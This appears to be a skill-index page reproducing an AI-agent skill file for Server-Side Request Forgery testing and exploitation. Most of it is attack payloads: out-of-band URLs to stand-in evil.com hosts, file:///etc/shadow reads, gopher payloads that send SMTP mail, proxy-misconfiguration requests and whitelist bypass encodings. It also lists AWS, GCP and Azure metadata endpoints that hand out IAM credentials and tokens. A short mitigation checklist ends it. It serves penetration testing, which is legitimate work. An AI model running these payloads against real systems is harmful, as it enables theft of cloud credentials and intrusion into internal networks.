OpenSkillIndex← back to search

Hacktricks-skills ssrf-pentest

Server-Side Request Forgery (SSRF) vulnerability assessment and exploitation. Use this skill whenever the user mentions SSRF, server-side request forgery, internal network access, cloud metadata endpoints, blind SSRF, gopher protocol payloads, or any scenario where a server might be tricked into making requests to internal or attacker-controlled resources. This includes testing for SSRF in web applications, analyzing proxy misconfigurations, exploiting cloud metadata services, and generating payloads for various protocols.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/ssrf-server-side-request-forgery/ssrf-server-side-request-forgery/SKILL.MD
source content

SSRF Pentest Skill

A comprehensive guide for identifying, testing, and exploiting Server-Side Request Forgery vulnerabilities.

What is SSRF?

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a server-side application into making HTTP requests to a domain of their choice. This exposes the server to arbitrary external requests directed by the attacker, potentially allowing access to internal services, cloud metadata, or local resources.

When to Use This Skill

Use this skill when:

  • Testing web applications for SSRF vulnerabilities
  • Analyzing endpoints that accept URLs, file paths, or document sources
  • Investigating proxy misconfigurations
  • Exploiting cloud metadata endpoints (AWS, GCP, Azure)
  • Generating payloads for various protocols (gopher, file, dict, etc.)
  • Testing blind SSRF scenarios
  • Bypassing SSRF protections and whitelists

SSRF Detection Workflow

Step 1: Identify Potential SSRF Vectors

Look for these common patterns:

  • URL parameters (
    ?url=
    , 
    ?redirect=
    , 
    ?callback=
    )
  • File upload endpoints that fetch remote content
  • API endpoints accepting document URLs
  • Image processing services
  • PDF generation from URLs
  • Webhook configurations
  • Import/export features
  • RSS feed readers
  • Sitemap generators

Step 2: Capture SSRF Interactions

Use out-of-band (OOB) detection tools to confirm SSRF:

ToolPurpose
Burp CollaboratorHTTP/DNS interaction capture
pingb.inDNS-based detection
canarytokens.orgEmail/HTTP/DNS tokens
interactshSelf-hosted OOB testing
webhook.siteQuick HTTP endpoint
ssrf-sheriffSSRF-specific detection

Quick test:

# Test with your OOB endpoint
?url=http://your-collaborator-domain.evil.com/test
?url=http://your-collaborator-domain.evil.com/?callback=whoami

Step 3: Protocol-Based Testing

Try these protocols to bypass filters:

File Protocol

file:///etc/passwd
file:///etc/shadow
file:///C:/Windows/win.ini
file:///var/www/html/config.php

Gopher Protocol (Most Powerful)

Gopher allows raw TCP communication. Use 

scripts/generate-gopher-payload.py
to create payloads.

Basic format:

gopher://<host>:<port>_<raw_bytes>

Example - SMTP:

gopher://127.0.0.1:25/_HELO%20localhost%0d%0aMAIL%20FROM%3A%3Chacker@site.com%3E%0d%0aRCPT%20TO%3A%3Cvictim@site.com%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%0d%0aTo%3A%20%3Cvictim@site.com%3E%0d%0aSubject%3A%20Test%0d%0a%0d%0aPayload%0d%0a%0d%0a.%0d%0aQUIT%0d%0a

Example - HTTP:

gopher://<server>:8080/_GET%20/%20HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie:%20eatme%0A%0Abody

Other Protocols

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
sftp://generic.com:11111/
tftp://generic.com:12346/TESTUDPPACKET
ldap://localhost:11211/%0astats%0aquit

Bypass Techniques

Whitelist Bypass

When domains are whitelisted, try:

  1. Open Redirect Chain

    • Find an open redirect on a whitelisted domain
    • Chain: SSRF → whitelisted domain → open redirect → internal resource

  2. URL Encoding Variations

    %6a%61%76%61%73%63%72%69%70%74%3a  # javascript:
%2f%2f                            # //
%0a                               # newline
%0d%0a                            # CRLF

  3. Curl URL Globbing

    file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

  4. IP Encoding

    127.0.0.1
0177.0.0.1          # octal
0x7f.0x0.0x0.0x1    # hex
2130706433          # decimal
localhost
::1                 # IPv6

Proxy Misconfiguration Exploits

Flask Proxy

GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Server

GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

Open Forward Proxy

GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

Blind SSRF Techniques

Time-Based Detection

Measure response times to determine if resources exist:

# Fast response = resource doesn't exist
?url=http://127.0.0.1:9999/

# Slow response = resource exists (connection timeout)
?url=http://127.0.0.1:8080/

Status Code Leaking

Some applications leak response data after encountering unusual redirect codes (305-310):

  1. Set up a redirect server (use 
    scripts/redirect-server.py
    )
  2. Chain redirects: 302 → 305 → 306 → 307 → 308 → 309 → 310 → target
  3. Application enters error mode and dumps response

HTML-to-PDF SSRF

PDF generators fetch resources in HTML:

<html>
  <body>
    <img width="1" height="1" src="http://127.0.0.1:8080/healthz">
    <link rel="stylesheet" href="http://10.0.0.5/admin" />
  </body>
</html>

Cloud Metadata Exploitation

AWS

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
http://169.254.169.254/latest/user-data/

GCP

http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Azure

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01

Advanced Exploitation

SNI-Based SSRF

Exploit Nginx misconfigurations:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

TLS AIA CA Issuers (Java mTLS)

Craft client certificates with malicious AIA URIs:

# Server-side (Java)
java -Dcom.sun.security.enableAIAcaIssuers=true -jar server.jar

# Client cert AIA: http://localhost:8080
# Server will fetch during handshake

DNS Rebinding

Bypass CORS/SOP restrictions:

  1. Set DNS TTL to 0 seconds
  2. First request: attacker domain → attacker IP
  3. Second request: attacker domain → internal IP
  4. Browser reuses connection to internal resource

Use tools: 

singularity
, 
rebind.it

Scripts

Generate Gopher Payloads

python scripts/generate-gopher-payload.py --protocol smtp --host 127.0.0.1 --port 25 --command "HELO localhost"

Redirect Server for Testing

python scripts/redirect-server.py --port 8443 --target "gopher://127.0.0.1:5985/..."

SSRF Scanner

python scripts/ssrf-scanner.py --target http://vulnerable-app.com --param url --output results.json

Common Vulnerable Functions

PHP

  • file_get_contents()
  • fopen()
  • curl_exec()
  • include()
    / 
    require()
  • simplexml_load_file()

Python

  • requests.get()
  • urllib.request.urlopen()
  • urllib2.urlopen()

Node.js

  • http.get()
  • https.get()
  • axios.get()
  • fetch()

Mitigation Checklist

  • Validate and sanitize all URL inputs
  • Use allowlists for permitted domains
  • Disable dangerous protocols (file://, gopher://, etc.)
  • Implement network segmentation
  • Use VPC endpoints for cloud metadata
  • Set 
    no_proxy
    environment variables
  • Validate redirects don't point to internal resources
  • Use security groups to block internal access from web tier

References